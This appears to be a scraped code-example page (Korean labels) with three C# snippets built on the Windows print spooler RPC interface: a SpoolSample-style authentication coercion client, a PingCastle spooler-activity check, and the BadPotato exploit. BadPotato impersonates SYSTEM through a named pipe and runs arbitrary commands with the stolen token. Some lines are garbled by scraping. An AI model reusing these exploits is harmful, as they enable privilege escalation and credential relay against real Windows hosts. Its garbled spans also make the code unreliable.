예제 #1
0
        static void Main(string[] args)
        {
            //for reference https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-RPRN/%5bMS-RPRN%5d.pdf
            Console.WriteLine("SpoolSamplerNET client01 dc01");

            string captureServer = "\\\\" + args[0];
            string printerHost   = "\\\\" + args[1];

            rprn printer = new rprn();

            rprn.DEVMODE_CONTAINER devmodeContainer = new rprn.DEVMODE_CONTAINER();

            if (printer.RpcOpenPrinter(printerHost, out var handle, null, ref devmodeContainer, 0) != 0)
            {
                Console.WriteLine("[-] Failed to open printer over RPC");
                return;
            }
예제 #2
0
        public static bool CheckIfTheSpoolerIsActive(string computer)
        {
            IntPtr hHandle = IntPtr.Zero;
            var    test    = new rprn();

            var devmodeContainer = new PingCastle.RPC.rprn.DEVMODE_CONTAINER();

            try
            {
                var ret = test.RpcOpenPrinter("\\\\" + computer, out hHandle, null, ref devmodeContainer, 0);
                if (ret == 0)
                {
                    return(true);
                }
            }
            finally
            {
                if (hHandle != IntPtr.Zero)
                {
                    test.RpcClosePrinter(ref hHandle);
                }
            }
            return(false);
        }
예제 #3
0
        static void Main(string[] args)
        {
            Console.WriteLine(@"[*]

    ____            ______        __        __      
   / __ )____ _____/ / __ \____  / /_____ _/ /_____ 
  / __  / __ `/ __  / /_/ / __ \/ __/ __ `/ __/ __ \
 / /_/ / /_/ / /_/ / ____/ /_/ / /_/ /_/ / /_/ /_/ /
/_____/\__,_/\__,_/_/    \____/\__/\__,_/\__/\____/ 

Github:https://github.com/BeichenDream/BadPotato/       By:BeichenDream
            ");

            if (args.Length < 1)
            {
                Console.WriteLine("[!] No Command");
                return;
            }

            SECURITY_ATTRIBUTES securityAttributes = new SECURITY_ATTRIBUTES();
            string pipeName = Guid.NewGuid().ToString("N");

            Console.WriteLine("[*] PipeName : " + string.Format("\\\\.\\pipe\\{0}\\pipe\\spoolss", pipeName));
            Console.WriteLine("[*] ConnectPipeName : " + string.Format("\\\\{0}/pipe/{1}", Environment.MachineName, pipeName));

            IntPtr pipeHandle = CreateNamedPipeW(string.Format("\\\\.\\pipe\\{0}\\pipe\\spoolss", pipeName), 0x00000003 | 0x40000000, 0x00000000, 10, 2048, 2048, 0, ref securityAttributes);

            if (pipeHandle != IntPtr.Zero)
            {
                Console.WriteLine(string.Format("[*] {0} Success! IntPtr:{1}", "CreateNamedPipeW", pipeHandle));
                rprn rprn = new rprn();
                DEVMODE_CONTAINER dEVMODE_CONTAINER = new DEVMODE_CONTAINER();
                IntPtr            rpcPrinterHandle  = IntPtr.Zero;
                rprn.RpcOpenPrinter(string.Format("\\\\{0}", Environment.MachineName), out rpcPrinterHandle, null, ref dEVMODE_CONTAINER, 0);
                if (rpcPrinterHandle != IntPtr.Zero)
                {
                    if (rprn.RpcRemoteFindFirstPrinterChangeNotificationEx(rpcPrinterHandle, 0x00000100, 0, string.Format("\\\\{0}/pipe/{1}", Environment.MachineName, pipeName), 0) != -1)
                    {
                        Console.WriteLine(string.Format("[*] {0} Success! IntPtr:{1}", "RpcRemoteFindFirstPrinterChangeNotificationEx", rpcPrinterHandle));
                        Thread thread = new Thread(() => ConnectNamedPipe(pipeHandle, IntPtr.Zero));
                        thread.Start();
                        if (thread.Join(5000))
                        {
                            Console.WriteLine("[*] ConnectNamePipe Success!");
                            StringBuilder stringBuilder = new StringBuilder();
                            GetNamedPipeHandleState(pipeHandle, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, stringBuilder, stringBuilder.Capacity);
                            Console.WriteLine("[*] CurrentUserName : "******"[*] CurrentConnectPipeUserName : "******"[*] ImpersonateNamedPipeClient Success!");
                                IntPtr hSystemToken = IntPtr.Zero;
                                if (OpenThreadToken(GetCurrentThread(), 983551, false, ref hSystemToken))
                                {
                                    Console.WriteLine(string.Format("[*] {0} Success! IntPtr:{1}", "OpenThreadToken", hSystemToken));
                                    IntPtr hSystemTokenDup = IntPtr.Zero;
                                    if (DuplicateTokenEx(hSystemToken, 983551, 0, 2, 1, ref hSystemTokenDup))
                                    {
                                        Console.WriteLine(string.Format("[*] {0} Success! IntPtr:{1}", "DuplicateTokenEx", hSystemTokenDup));
                                        if (SetThreadToken(IntPtr.Zero, hSystemToken))
                                        {
                                            Console.WriteLine("[*] SetThreadToken Success!");
                                            Console.WriteLine("[*] CurrentThreadUserName : "******"[*] {0} Success! out_read:{1} out_write:{2}", "CreateOutReadPipe", out_read, out_write));
                                            }
                                            else
                                            {
                                                Console.WriteLine("[!] CreateOutReadPipe fail!");
                                            }

                                            if (CreatePipe(ref err_read, ref err_write, ref saAttr, 0))
                                            {
                                                Console.WriteLine(string.Format("[*] {0} Success! err_read:{1} err_write:{2}", "CreateErrReadPipe", err_read, err_write));
                                            }
                                            else
                                            {
                                                Console.WriteLine("[!] CreateErrReadPipe fail!");
                                            }

                                            SetHandleInformation(out_read, 0x00000001, 0);
                                            SetHandleInformation(err_read, 0x00000001, 0);

                                            STARTUPINFO         si = new STARTUPINFO();
                                            PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
                                            si.cb         = Marshal.SizeOf(si);
                                            si.lpDesktop  = @"WinSta0\Default";
                                            si.hStdOutput = out_write;
                                            si.hStdError  = err_write;
                                            si.dwFlags   |= 0x00000100;

                                            string lpApplicationName = Environment.SystemDirectory + "/cmd.exe";
                                            string lpCommandLine     = "cmd /c " + args[0];
                                            // bool flag=CreateProcessAsUserW(hSystemTokenDup, null, lpCommandLine, IntPtr.Zero, IntPtr.Zero, false, 0, IntPtr.Zero, Environment.SystemDirectory, ref si, out pi);
                                            if (CreateProcessWithTokenW(hSystemTokenDup, 0, null, lpCommandLine, 0x08000000, IntPtr.Zero, Environment.CurrentDirectory, ref si, out pi))
                                            {
                                                Console.WriteLine(string.Format("[*] {0} Success! ProcessPid:{1}", "CreateProcessWithTokenW", pi.dwProcessId));
                                                CloseHandle(out_write);
                                                CloseHandle(err_write);
                                                byte[] buf    = new byte[4098];
                                                int    dwRead = 0;
                                                while (ReadFile(out_read, buf, 4098, ref dwRead, IntPtr.Zero))
                                                {
                                                    byte[] outBytes = new byte[dwRead];
                                                    Array.Copy(buf, outBytes, dwRead);
                                                    Console.WriteLine(System.Text.Encoding.Default.GetString(outBytes));
                                                }
                                                while (ReadFile(err_read, buf, 4098, ref dwRead, IntPtr.Zero))
                                                {
                                                    byte[] outBytes = new byte[dwRead];
                                                    Array.Copy(buf, outBytes, dwRead);
                                                    Console.WriteLine(System.Text.Encoding.Default.GetString(outBytes));
                                                }

                                                CloseHandle(err_read);
                                                CloseHandle(out_read);
                                                CloseHandle(out_write);
                                                CloseHandle(err_write);
                                                CloseHandle(hSystemTokenDup);
                                                CloseHandle(hSystemToken);
                                                CloseHandle(rpcPrinterHandle);
                                                CloseHandle(pipeHandle);
                                                Console.WriteLine("[*] Bye!");
                                            }
                                            else
                                            {
                                                Console.WriteLine(new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()).Message);
                                                Console.WriteLine("[!] CreateProcessWithTokenW fail!");
                                            }
                                        }
                                        else
                                        {
                                            Console.WriteLine(new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()).Message);
                                            Console.WriteLine("[!] SetThreadToken fail!");
                                        }
                                    }
                                    else
                                    {
                                        Console.WriteLine(new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()).Message);
                                        Console.WriteLine("[!] DuplicateTokenEx fail!");
                                    }
                                }
                                else
                                {
                                    Console.WriteLine(new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()).Message);
                                    Console.WriteLine("[!] OpenThreadToken fail!");
                                }
                            }
                            else
                            {
                                Console.WriteLine(new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()).Message);
                                Console.WriteLine("[!] ImpersonateNamedPipeClient fail!");
                            }
                        }
                        else
                        {
                            CloseHandle(rpcPrinterHandle);
                            CloseHandle(pipeHandle);
                            Console.WriteLine("[!] ConnectNamePipe Time Out!");
                        }
                    }
                    else
                    {
                        Console.WriteLine(new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()).Message);
                        Console.WriteLine("[!] RpcRemoteFindFirstPrinterChangeNotificationEx fail!");
                    }
                }
                else
                {
                    CloseHandle(pipeHandle);
                    Console.WriteLine("[!] RpcOpenPrinter fail!");
                }
            }
            else
            {
                Console.WriteLine(new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()).Message);
                Console.WriteLine("[!] CreateNamedPipeW fail!");
            }
        }